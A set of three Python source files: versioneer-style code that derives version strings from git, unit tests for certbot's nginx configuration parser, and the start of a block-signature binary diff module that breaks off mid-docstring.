    """Try each executable in *commands* with *args*; return stdout or None.

    Candidates are tried in order until one can be spawned; returns the
    stripped stdout text on success, None when nothing could be run or the
    process exited non-zero.
    """
    assert isinstance(commands, list)
    proc = None
    for cmd in commands:
        try:
            dispcmd = str([cmd] + args)
            # remember shell=False, so use git.cmd on windows, not just git
            stderr_target = subprocess.PIPE if hide_stderr else None
            proc = subprocess.Popen([cmd] + args, cwd=cwd,
                                    stdout=subprocess.PIPE,
                                    stderr=stderr_target)
            break
        except EnvironmentError:
            exc = sys.exc_info()[1]
            if exc.errno == errno.ENOENT:
                # executable not found -- try the next candidate
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(exc)
            return None
    else:
        # loop exhausted without a successful Popen
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None
    stdout = proc.communicate()[0].strip()
    if sys.version_info[0] >= 3:
        stdout = stdout.decode()
    if proc.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
        return None
    return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes
    both the project name and a version string.
    """
    dirname = os.path.basename(root)
    if dirname.startswith(parentdir_prefix):
        return {
            "version": dirname[len(parentdir_prefix):],
            "full-revisionid": None,
            "dirty": False,
            "error": None,
        }
    if verbose:
        print("guessing rootdir is '%s', but '%s' doesn't start with "
              "prefix '%s'" % (root, dirname, parentdir_prefix))
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
    """Extract version information from the given file.

    Scans *versionfile_abs* for the ``git_refnames`` and ``git_full``
    assignments and returns whatever was found (possibly an empty dict).
    """
    # the code embedded in _version.py can just fetch the value of these
    # keywords. When used from setup.py, we don't want to import _version.py,
    # so we do it with a regexp instead. This function is not used from
    # _version.py.
    keywords = {}
    try:
        # BUG FIX: use a context manager so the handle is closed even when a
        # read raises; the old open()/close() pair leaked it on mid-read
        # errors (the exception was then silently swallowed below).
        with open(versionfile_abs, "r") as f:
            for line in f.readlines():
                if line.strip().startswith("git_refnames ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["refnames"] = mo.group(1)
                if line.strip().startswith("git_full ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["full"] = mo.group(1)
    except EnvironmentError:
        # Missing/unreadable file: fall through with whatever was collected.
        pass
    return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
    """Get version information from git keywords."""
    if not keywords:
        raise NotThisMethod("no keywords at all, weird")
    refnames = keywords["refnames"].strip()
    if refnames.startswith("$Format"):
        if verbose:
            print("keywords are unexpanded, not using")
        raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
    refs = {ref.strip() for ref in refnames.strip("()").split(",")}
    # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
    # just "foo-1.0". If we see a "tag: " prefix, prefer those.
    TAG = "tag: "
    tags = {ref[len(TAG):] for ref in refs if ref.startswith(TAG)}
    if not tags:
        # Either we're using git < 1.8.3, or there really are no tags. We use
        # a heuristic: assume all version tags have a digit. The old git %d
        # expansion behaves like git log --decorate=short and strips out the
        # refs/heads/ and refs/tags/ prefixes that would let us distinguish
        # between branches and tags. By ignoring refnames without digits, we
        # filter out many common branch names like "release" and
        # "stabilization", as well as "HEAD" and "master".
        tags = {ref for ref in refs if re.search(r'\d', ref)}
        if verbose:
            print("discarding '%s', no digits" % ",".join(refs - tags))
    if verbose:
        print("likely tags: %s" % ",".join(sorted(tags)))
    for ref in sorted(tags):
        # sorting will prefer e.g. "2.0" over "2.0rc1"
        if not ref.startswith(tag_prefix):
            continue
        version = ref[len(tag_prefix):]
        if verbose:
            print("picking %s" % version)
        return {"version": version,
                "full-revisionid": keywords["full"].strip(),
                "dirty": False, "error": None}
    # no suitable tags, so version is "0+unknown", but full hex is still there
    if verbose:
        print("no suitable tags, using unknown + full revision id")
    return {"version": "0+unknown",
            "full-revisionid": keywords["full"].strip(),
            "dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
    """Get version from 'git describe' in the root of the source tree.

    This only gets called if the git-archive 'subst' keywords were *not*
    expanded, and _version.py hasn't already been rewritten with a short
    version string, meaning we're inside a checked out source tree.

    ``run_command`` is a parameter so callers can substitute a different
    command runner (presumably for testing -- confirm before relying on it).
    """
    if not os.path.exists(os.path.join(root, ".git")):
        if verbose:
            print("no .git in %s" % root)
        raise NotThisMethod("no .git directory")
    GITS = ["git"]
    if sys.platform == "win32":
        GITS = ["git.cmd", "git.exe"]
    # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
    # if there isn't one, this yields HEX[-dirty] (no NUM)
    describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
                                      "--always", "--long",
                                      "--match", "%s*" % tag_prefix],
                               cwd=root)
    # --long was added in git-1.5.5
    if describe_out is None:
        raise NotThisMethod("'git describe' failed")
    describe_out = describe_out.strip()
    full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
    if full_out is None:
        raise NotThisMethod("'git rev-parse' failed")
    full_out = full_out.strip()
    pieces = {}
    pieces["long"] = full_out
    pieces["short"] = full_out[:7]  # maybe improved later
    pieces["error"] = None
    # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
    # TAG might have hyphens.
    git_describe = describe_out
    # look for -dirty suffix
    dirty = git_describe.endswith("-dirty")
    pieces["dirty"] = dirty
    if dirty:
        git_describe = git_describe[:git_describe.rindex("-dirty")]
    # now we have TAG-NUM-gHEX or HEX
    if "-" in git_describe:
        # TAG-NUM-gHEX; the regex anchors NUM and HEX so hyphens inside TAG
        # are consumed greedily by the first group.
        mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
        if not mo:
            # unparseable. Maybe git-describe is misbehaving?
            pieces["error"] = ("unable to parse git-describe output: '%s'"
                               % describe_out)
            return pieces
        # tag
        full_tag = mo.group(1)
        if not full_tag.startswith(tag_prefix):
            if verbose:
                fmt = "tag '%s' doesn't start with prefix '%s'"
                print(fmt % (full_tag, tag_prefix))
            pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
                               % (full_tag, tag_prefix))
            return pieces
        pieces["closest-tag"] = full_tag[len(tag_prefix):]
        # distance: number of commits since tag
        pieces["distance"] = int(mo.group(2))
        # commit: short hex revision ID
        pieces["short"] = mo.group(3)
    else:
        # HEX: no tags
        pieces["closest-tag"] = None
        count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
                                cwd=root)
        pieces["distance"] = int(count_out)  # total number of commits
    return pieces
def plus_or_dot(pieces):
    """Return a + if we don't already have one, else return a .

    BUG FIX: pieces["closest-tag"] may be present with the value None (set by
    git_pieces_from_vcs when there are no tags); ``pieces.get(..., "")`` does
    not guard against that and ``"+" in None`` raises TypeError. Coalesce
    None to "" explicitly.
    """
    if "+" in (pieces.get("closest-tag") or ""):
        return "."
    return "+"
def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1: no tag anywhere in history
        version = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            version += ".dirty"
        return version
    version = tag
    if pieces["distance"] or pieces["dirty"]:
        version += plus_or_dot(pieces)
        version += "%d.g%s" % (pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            version += ".dirty"
    return version
def render_pep440_pre(pieces):
    """TAG[.post.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post.devDISTANCE
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1
        return "0.post.dev%d" % pieces["distance"]
    if pieces["distance"]:
        return tag + ".post.dev%d" % pieces["distance"]
    return tag
def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    The ".dev0" means dirty. Note that .dev0 sorts backwards
    (a dirty tree will appear "older" than the corresponding clean one),
    but you shouldn't be releasing software with -dirty anyways.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    if tag:
        version = tag
        if pieces["distance"] or pieces["dirty"]:
            version += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                version += ".dev0"
            version += plus_or_dot(pieces)
            version += "g%s" % pieces["short"]
        return version
    # exception #1: no tags
    version = "0.post%d" % pieces["distance"]
    if pieces["dirty"]:
        version += ".dev0"
    version += "+g%s" % pieces["short"]
    return version
def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1
        version = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            version += ".dev0"
        return version
    if pieces["distance"] or pieces["dirty"]:
        version = tag + ".post%d" % pieces["distance"]
        if pieces["dirty"]:
            version += ".dev0"
        return version
    return tag
def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Like 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        version = tag
        if pieces["distance"]:
            version += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        version = pieces["short"]
    if pieces["dirty"]:
        version += "-dirty"
    return version
def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Like 'git describe --tags --dirty --always -long'.
    The distance/hash is unconditional.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        version = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        # exception #1
        version = pieces["short"]
    if pieces["dirty"]:
        version += "-dirty"
    return version
def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        # Discovery failed somewhere; surface the error instead of a version.
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"]}
    if not style or style == "default":
        style = "pep440"  # the default
    # Dispatch table instead of an if/elif chain.
    renderers = {
        "pep440": render_pep440,
        "pep440-pre": render_pep440_pre,
        "pep440-post": render_pep440_post,
        "pep440-old": render_pep440_old,
        "git-describe": render_git_describe,
        "git-describe-long": render_git_describe_long,
    }
    if style not in renderers:
        raise ValueError("unknown style '%s'" % style)
    rendered = renderers[style](pieces)
    return {"version": rendered, "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"], "error": None}
def get_versions():
    """Get version information or return default if unable to do so.

    Tries, in order: expanded git-archive keywords, "git describe" on a
    checked-out tree, and finally the parent-directory name (sdist layout).
    """
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.
    cfg = get_config()
    verbose = cfg.verbose
    # Strategy 1: git-archive keyword expansion.
    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
                                          verbose)
    except NotThisMethod:
        pass
    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file. Invert
        # this to find the root from __file__.
        for i in cfg.versionfile_source.split('/'):
            root = os.path.dirname(root)
    except NameError:
        # No __file__ (frozen interpreter) and keywords were unexpanded.
        return {"version": "0+unknown", "full-revisionid": None,
                "dirty": None,
                "error": "unable to find root of source tree"}
    # Strategy 2: "git describe" inside a checked-out source tree.
    try:
        pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
        return render(pieces, cfg.style)
    except NotThisMethod:
        pass
    # Strategy 3: version embedded in the unpacked directory name.
    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass
    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None,
            "error": "unable to compute version"}
|
|
"""Test for certbot_nginx._internal.nginxparser."""
import copy
import operator
import tempfile
import unittest
from pyparsing import ParseException
from certbot_nginx._internal.nginxparser import dump
from certbot_nginx._internal.nginxparser import dumps
from certbot_nginx._internal.nginxparser import load
from certbot_nginx._internal.nginxparser import loads
from certbot_nginx._internal.nginxparser import RawNginxParser
from certbot_nginx._internal.nginxparser import UnspacedList
import test_util as util
FIRST = operator.itemgetter(0)
class TestRawNginxParser(unittest.TestCase):
    """Test the raw low-level Nginx config parser."""

    def test_assignments(self):
        parsed = RawNginxParser.assignment.parseString('root /test;').asList()
        self.assertEqual(parsed, ['root', ' ', '/test'])
        parsed = RawNginxParser.assignment.parseString('root /test;foo bar;').asList()
        # NOTE(review): the third positional argument of assertEqual is the
        # failure *message*, so ['foo', ' ', 'bar'] is never compared here.
        # Presumably both assignments were meant to be asserted -- confirm.
        self.assertEqual(parsed, ['root', ' ', '/test'], ['foo', ' ', 'bar'])

    def test_blocks(self):
        parsed = RawNginxParser.block.parseString('foo {}').asList()
        self.assertEqual(parsed, [['foo', ' '], []])
        parsed = RawNginxParser.block.parseString('location /foo{}').asList()
        self.assertEqual(parsed, [['location', ' ', '/foo'], []])
        parsed = RawNginxParser.block.parseString('foo { bar foo ; }').asList()
        self.assertEqual(parsed, [['foo', ' '], [[' ', 'bar', ' ', 'foo', ' '], ' ']])

    def test_nested_blocks(self):
        parsed = RawNginxParser.block.parseString('foo { bar {} }').asList()
        block, content = parsed
        self.assertEqual(FIRST(content), [[' ', 'bar', ' '], []])
        self.assertEqual(FIRST(block), 'foo')

    def test_dump_as_string(self):
        # Whitespace tokens embedded in the tree must round-trip verbatim
        # into the emitted text.
        dumped = dumps(UnspacedList([
            ['user', ' ', 'www-data'],
            [['\n', 'server', ' '], [
                ['\n ', 'listen', ' ', '80'],
                ['\n ', 'server_name', ' ', 'foo.com'],
                ['\n ', 'root', ' ', '/home/ubuntu/sites/foo/'],
                [['\n\n ', 'location', ' ', '/status', ' '], [
                    ['\n ', 'check_status', ''],
                    [['\n\n ', 'types', ' '],
                     [['\n ', 'image/jpeg', ' ', 'jpg']]],
                ]]
            ]]]))
        self.assertEqual(dumped.split('\n'),
                         'user www-data;\n'
                         'server {\n'
                         ' listen 80;\n'
                         ' server_name foo.com;\n'
                         ' root /home/ubuntu/sites/foo/;\n'
                         '\n'
                         ' location /status {\n'
                         ' check_status;\n'
                         '\n'
                         ' types {\n'
                         ' image/jpeg jpg;}}}'.split('\n'))

    def test_parse_from_file(self):
        with open(util.get_data_filename('foo.conf')) as handle:
            parsed = util.filter_comments(load(handle))
        self.assertEqual(
            parsed,
            [['user', 'www-data'],
             [['http'],
              [[['server'], [
                  ['listen', '*:80', 'default_server', 'ssl'],
                  ['server_name', '*.www.foo.com', '*.www.example.com'],
                  ['root', '/home/ubuntu/sites/foo/'],
                  [['location', '/status'], [
                      [['types'], [['image/jpeg', 'jpg']]],
                  ]],
                  [['location', '~', r'case_sensitive\.php$'], [
                      ['index', 'index.php'],
                      ['root', '/var/root'],
                  ]],
                  [['location', '~*', r'case_insensitive\.php$'], []],
                  [['location', '=', r'exact_match\.php$'], []],
                  [['location', '^~', r'ignore_regex\.php$'], []]
              ]]]]]
        )

    def test_parse_from_file2(self):
        with open(util.get_data_filename('edge_cases.conf')) as handle:
            parsed = util.filter_comments(load(handle))
        self.assertEqual(
            parsed,
            [[['server'], [['server_name', 'simple']]],
             [['server'],
              [['server_name', 'with.if'],
               [['location', '~', '^/services/.+$'],
                [[['if', '($request_filename', '~*', '\\.(ttf|woff)$)'],
                  [['add_header', 'Access-Control-Allow-Origin', '"*"']]]]]]],
             [['server'],
              [['server_name', 'with.complicated.headers'],
               [['location', '~*', '\\.(?:gif|jpe?g|png)$'],
                [['add_header', 'Pragma', 'public'],
                 ['add_header',
                  'Cache-Control', '\'public, must-revalidate, proxy-revalidate\'',
                  '"test,;{}"', 'foo'],
                 ['blah', '"hello;world"'],
                 ['try_files', '$uri', '@rewrites']]]]]])

    def test_parse_from_file3(self):
        # Multi-line quoted values must survive parsing intact.
        with open(util.get_data_filename('multiline_quotes.conf')) as handle:
            parsed = util.filter_comments(load(handle))
        self.assertEqual(
            parsed,
            [[['http'],
              [[['server'],
                [['listen', '*:443'],
                 [['location', '/'],
                  [['body_filter_by_lua',
                    '\'ngx.ctx.buffered = (ngx.ctx.buffered or "")'
                    ' .. string.sub(ngx.arg[1], 1, 1000)\n'
                    ' '
                    'if ngx.arg[2] then\n'
                    ' '
                    'ngx.var.resp_body = ngx.ctx.buffered\n'
                    ' end\'']]]]]]]])

    def test_abort_on_parse_failure(self):
        with open(util.get_data_filename('broken.conf')) as handle:
            self.assertRaises(ParseException, load, handle)

    def test_dump_as_file(self):
        with open(util.get_data_filename('nginx.conf')) as handle:
            parsed = load(handle)
        parsed[-1][-1].append(UnspacedList([['server'],
                              [['listen', ' ', '443', ' ', 'ssl'],
                               ['server_name', ' ', 'localhost'],
                               ['ssl_certificate', ' ', 'cert.pem'],
                               ['ssl_certificate_key', ' ', 'cert.key'],
                               ['ssl_session_cache', ' ', 'shared:SSL:1m'],
                               ['ssl_session_timeout', ' ', '5m'],
                               ['ssl_ciphers', ' ', 'HIGH:!aNULL:!MD5'],
                               [['location', ' ', '/'],
                                [['root', ' ', 'html'],
                                 ['index', ' ', 'index.html', ' ', 'index.htm']]]]]))
        # Round-trip through a temp file: dump, rewind, reload, compare.
        with tempfile.TemporaryFile(mode='w+t') as f:
            dump(parsed, f)
            f.seek(0)
            parsed_new = load(f)
        self.assertEqual(parsed, parsed_new)

    def test_comments(self):
        with open(util.get_data_filename('minimalistic_comments.conf')) as handle:
            parsed = load(handle)
        with tempfile.TemporaryFile(mode='w+t') as f:
            dump(parsed, f)
            f.seek(0)
            parsed_new = load(f)
        self.assertEqual(parsed, parsed_new)
        self.assertEqual(parsed_new, [
            ['#', " Use bar.conf when it's a full moon!"],
            ['include', 'foo.conf'],
            ['#', ' Kilroy was here'],
            ['check_status'],
            [['server'],
             [['#', ''],
              ['#', " Don't forget to open up your firewall!"],
              ['#', ''],
              ['listen', '1234'],
              ['#', ' listen 80;']]],
        ])

    def test_issue_518(self):
        parsed = loads('if ($http_accept ~* "webp") { set $webp "true"; }')
        self.assertEqual(parsed, [
            [['if', '($http_accept', '~*', '"webp")'],
             [['set', '$webp', '"true"']]]
        ])

    def test_comment_in_block(self):
        parsed = loads("""http {
          # server{
        }""")
        self.assertEqual(parsed, [
            [['http'],
             [['#', ' server{']]]
        ])

    def test_access_log(self):
        # see issue #3798
        parsed = loads('access_log syslog:server=unix:/dev/log,facility=auth,'
                       'tag=nginx_post,severity=info custom;')
        self.assertEqual(parsed, [
            ['access_log',
             'syslog:server=unix:/dev/log,facility=auth,tag=nginx_post,severity=info',
             'custom']
        ])

    def test_add_header(self):
        # see issue #3798
        parsed = loads('add_header Cache-Control no-cache,no-store,must-revalidate,max-age=0;')
        self.assertEqual(parsed, [
            ['add_header', 'Cache-Control', 'no-cache,no-store,must-revalidate,max-age=0']
        ])

    def test_map_then_assignment_in_block(self):
        # see issue #3798
        test_str = """http {
            map $http_upgrade $connection_upgrade {
              default upgrade;
              '' close;
              "~Opera Mini" 1;
              *.example.com 1;
            }
            one;
        }"""
        parsed = loads(test_str)
        self.assertEqual(parsed, [
            [['http'], [
                [['map', '$http_upgrade', '$connection_upgrade'], [
                    ['default', 'upgrade'],
                    ["''", 'close'],
                    ['"~Opera Mini"', '1'],
                    ['*.example.com', '1']
                ]],
                ['one']
            ]]
        ])

    def test_variable_name(self):
        parsed = loads('try_files /typo3temp/tx_ncstaticfilecache/'
                       '$host${request_uri}index.html @nocache;')
        self.assertEqual(parsed, [
            ['try_files',
             '/typo3temp/tx_ncstaticfilecache/$host${request_uri}index.html',
             '@nocache']
        ])

    def test_weird_blocks(self):
        test = r"""
        if ($http_user_agent ~ MSIE) {
            rewrite ^(.*)$ /msie/$1 break;
        }
        if ($http_cookie ~* "id=([^;]+)(?:;|$)") {
            set $id $1;
        }
        if ($request_method = POST) {
            return 405;
        }
        if ($request_method) {
            return 403;
        }
        if ($args ~ post=140){
            rewrite ^ http://example.com/;
        }
        location ~ ^/users/(.+\.(?:gif|jpe?g|png))$ {
            alias /data/w3/images/$1;
        }
        proxy_set_header X-Origin-URI ${scheme}://${http_host}/$request_uri;
        """
        parsed = loads(test)
        self.assertEqual(parsed, [[['if', '($http_user_agent', '~', 'MSIE)'],
                                   [['rewrite', '^(.*)$', '/msie/$1', 'break']]],
                                  [['if', '($http_cookie', '~*', '"id=([^;]+)(?:;|$)")'],
                                   [['set', '$id', '$1']]],
                                  [['if', '($request_method', '=', 'POST)'], [['return', '405']]],
                                  [['if', '($request_method)'],
                                   [['return', '403']]], [['if', '($args', '~', 'post=140)'],
                                                          [['rewrite', '^', 'http://example.com/']]],
                                  [['location', '~', '^/users/(.+\\.(?:gif|jpe?g|png))$'],
                                   [['alias', '/data/w3/images/$1']]],
                                  ['proxy_set_header', 'X-Origin-URI', '${scheme}://${http_host}/$request_uri']]
                         )

    def test_edge_cases(self):
        # quotes
        parsed = loads(r'"hello\""; # blah "heh heh"')
        self.assertEqual(parsed, [['"hello\\""'], ['#', ' blah "heh heh"']])
        # if with comment
        parsed = loads("""if ($http_cookie ~* "id=([^;]+)(?:;|$)") { # blah )
        }""")
        self.assertEqual(parsed, [[['if', '($http_cookie', '~*', '"id=([^;]+)(?:;|$)")'],
                                   [['#', ' blah )']]]])
        # end paren
        test = """
        one"test";
        ("two");
        "test")red;
        "test")"blue";
        "test")"three;
        (one"test")one;
        one";
        one"test;
        one"test"one;
        """
        parsed = loads(test)
        self.assertEqual(parsed, [
            ['one"test"'],
            ['("two")'],
            ['"test")red'],
            ['"test")"blue"'],
            ['"test")"three'],
            ['(one"test")one'],
            ['one"'],
            ['one"test'],
            ['one"test"one']
        ])
        self.assertRaises(ParseException, loads, r'"test"one;')  # fails
        self.assertRaises(ParseException, loads, r'"test;')  # fails
        # newlines (both backslash-continued and bare continuation lines)
        test = """
        server_name foo.example.com bar.example.com \
            baz.example.com qux.example.com;
        server_name foo.example.com bar.example.com
            baz.example.com qux.example.com;
        """
        parsed = loads(test)
        self.assertEqual(parsed, [
            ['server_name', 'foo.example.com', 'bar.example.com',
             'baz.example.com', 'qux.example.com'],
            ['server_name', 'foo.example.com', 'bar.example.com',
             'baz.example.com', 'qux.example.com']
        ])
        # variable weirdness
        parsed = loads("directive $var ${var} $ ${};")
        self.assertEqual(parsed, [['directive', '$var', '${var}', '$', '${}']])
        self.assertRaises(ParseException, loads, "server {server_name test.com};")
        self.assertEqual(loads("blag${dfgdfg};"), [['blag${dfgdfg}']])
        self.assertRaises(ParseException, loads, "blag${dfgdf{g};")
        # empty file
        parsed = loads("")
        self.assertEqual(parsed, [])
class TestUnspacedList(unittest.TestCase):
    """Test the UnspacedList data structure"""

    def setUp(self):
        # Raw lists with interleaved whitespace tokens; UnspacedList hides
        # the whitespace while keeping it available via .spaced.
        self.a = ["\n ", "things", " ", "quirk"]
        self.b = ["y", " "]
        self.l = self.a[:]
        self.l2 = self.b[:]
        self.ul = UnspacedList(self.l)
        self.ul2 = UnspacedList(self.l2)

    def test_construction(self):
        self.assertEqual(self.ul, ["things", "quirk"])
        self.assertEqual(self.ul2, ["y"])

    def test_append(self):
        ul3 = copy.deepcopy(self.ul)
        ul3.append("wise")
        self.assertEqual(ul3, ["things", "quirk", "wise"])
        # .spaced keeps the original whitespace-bearing representation.
        self.assertEqual(ul3.spaced, self.a + ["wise"])

    def test_add(self):
        ul3 = self.ul + self.ul2
        self.assertEqual(ul3, ["things", "quirk", "y"])
        self.assertEqual(ul3.spaced, self.a + self.b)
        # Addition must not mutate the left operand.
        self.assertEqual(self.ul.spaced, self.a)
        ul3 = self.ul + self.l2
        self.assertEqual(ul3, ["things", "quirk", "y"])
        self.assertEqual(ul3.spaced, self.a + self.b)

    def test_extend(self):
        ul3 = copy.deepcopy(self.ul)
        ul3.extend(self.ul2)
        self.assertEqual(ul3, ["things", "quirk", "y"])
        self.assertEqual(ul3.spaced, self.a + self.b)
        self.assertEqual(self.ul.spaced, self.a)

    def test_set(self):
        ul3 = copy.deepcopy(self.ul)
        ul3[0] = "zither"
        l = ["\n ", "zather", "zest"]
        ul3[1] = UnspacedList(l)
        self.assertEqual(ul3, ["zither", ["zather", "zest"]])
        self.assertEqual(ul3.spaced, [self.a[0], "zither", " ", l])

    def test_get(self):
        self.assertRaises(IndexError, self.ul2.__getitem__, 2)
        self.assertRaises(IndexError, self.ul2.__getitem__, -3)

    def test_insert(self):
        x = UnspacedList(
            [['\n ', 'listen', ' ', '69.50.225.155:9000'],
             ['\n ', 'listen', ' ', '127.0.0.1'],
             ['\n ', 'server_name', ' ', '.example.com'],
             ['\n ', 'server_name', ' ', 'example.*'], '\n',
             ['listen', ' ', '5001', ' ', 'ssl']])
        x.insert(5, "FROGZ")
        self.assertEqual(x,
                         [['listen', '69.50.225.155:9000'], ['listen', '127.0.0.1'],
                          ['server_name', '.example.com'], ['server_name', 'example.*'],
                          ['listen', '5001', 'ssl'], 'FROGZ'])
        self.assertEqual(x.spaced,
                         [['\n ', 'listen', ' ', '69.50.225.155:9000'],
                          ['\n ', 'listen', ' ', '127.0.0.1'],
                          ['\n ', 'server_name', ' ', '.example.com'],
                          ['\n ', 'server_name', ' ', 'example.*'], '\n',
                          ['listen', ' ', '5001', ' ', 'ssl'],
                          'FROGZ'])

    def test_rawlists(self):
        ul3 = copy.deepcopy(self.ul)
        ul3.insert(0, "some")
        ul3.append("why")
        ul3.extend(["did", "whether"])
        del ul3[2]
        self.assertEqual(ul3, ["some", "things", "why", "did", "whether"])

    def test_is_dirty(self):
        self.assertIs(self.ul2.is_dirty(), False)
        ul3 = UnspacedList([])
        ul3.append(self.ul)
        self.assertIs(self.ul.is_dirty(), False)
        self.assertIs(ul3.is_dirty(), True)
        ul4 = UnspacedList([[1], [2, 3, 4]])
        self.assertIs(ul4.is_dirty(), False)
        # Mutating a nested list must mark the containing list dirty too.
        ul4[1][2] = 5
        self.assertIs(ul4.is_dirty(), True)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()  # pragma: no cover
|
|
#!/usr/bin/env python
from hashlib import sha256, md5
import struct
__VERSION = 2
def __signature(basis_file, block_size):
    """Yield the signature stream for *basis_file*.

    The stream is a header block (identifier, file type, format version,
    block size) followed by one MD5 digest per *block_size*-sized chunk.
    *basis_file* must be opened in binary mode; every yielded value is
    bytes, which is identical to str under Python 2 and correct under
    Python 3.
    """
    # Yield the identifier string, file type, version number and block size
    yield (b'bdif' + b'sig' +
           struct.pack('i', __VERSION) +
           struct.pack('i', block_size))
    # Calculate the hash of each block and yield it. The b'' sentinel stops
    # at EOF; the previous '' sentinel never matched a binary read() under
    # Python 3, producing an infinite loop.
    for block in iter(lambda: basis_file.read(block_size), b''):
        yield md5(block).digest()
def signature(basis_file, sig_file = None, block_size = 4096):
    """Generate a signature from a basis file.

    Arguments:
    basis_file: The original file that needs to be updated
    sig_file: (Optional) File object to output the signature; when omitted
        a generator over the signature blocks is returned instead.
    block_size: (Optional) Number of bytes per block. Fixed at this value
        for the rest of the process (delta and patch).
    """
    stream = __signature(basis_file, block_size)
    if sig_file is None:
        return stream
    for chunk in stream:
        sig_file.write(chunk)
def __delta(sig_file, new_file):
    """Yield delta blocks describing how to rebuild *new_file* from the
    basis file summarised by *sig_file*.

    NOTE(review): written for Python 2 -- the '' read sentinels and str
    concatenation assume str == bytes; confirm before running under
    Python 3.
    """
    # Make sure we are at the beginning of both files.
    sig_file.seek(0)
    new_file.seek(0)
    # Verify the file is for us
    if not sig_file.read(7) == 'bdifsig':
        raise Exception('Not a bdiff sig file')
    # Get the version number
    version_bytes = sig_file.read(4)
    version = int(struct.unpack('i', version_bytes)[0])
    if version == 2:
        # Get block_size from sig_file
        block_size_bytes = sig_file.read(4)
        block_size = int(struct.unpack('i', block_size_bytes)[0])
        # Write the identifier string, file type, version number and block size
        d_block = 'bdif' + 'dlt' + struct.pack('i', __VERSION) + block_size_bytes
        yield d_block
        # Read the signatures into memory, mapping each 16-byte MD5 digest
        # to the index of the basis-file block it came from.
        signatures = {}
        block_number = 0
        for block in iter(lambda: sig_file.read(16), ''):
            signatures[block] = block_number
            block_number += 1
        # Read the new_file calculating block hashes and comparing them to
        # the list from sig_file. Also calculate a whole file hash for error
        # checking.
        file_h = sha256()
        for block in iter(lambda: new_file.read(block_size), ''):
            h = md5(block)
            file_h.update(block)
            block_hash = h.digest()
            if block_hash in signatures:
                # 'C' instruction: copy block N from the basis_file.
                d_block = 'C' + struct.pack('i', signatures[block_hash])
                yield d_block
            elif len(block) == block_size:
                # 'D' instruction: full-size literal block follows inline.
                d_block = 'D' + block
                yield d_block
            else:
                # 'E' instruction: short (end-of-file) literal block;
                # includes an explicit length because it is < block_size.
                d_block = 'E' + struct.pack('i', len(block)) + block
                yield d_block
        # 'H' trailer: whole-file SHA-256 so patch() can verify the result.
        d_block = 'H' + file_h.digest()
        yield d_block
    else:
        raise Exception("Unknown signature file version")
def delta(sig_file, new_file, delta_file = None):
    """Generate a patch file using a signature and new file.

    Arguments:
    sig_file: File object for the signature file
    new_file: The updated file we are trying to replicate
    delta_file: (optional) File object to which the patch instructions will
        be written. If omitted, a generator over them is returned.
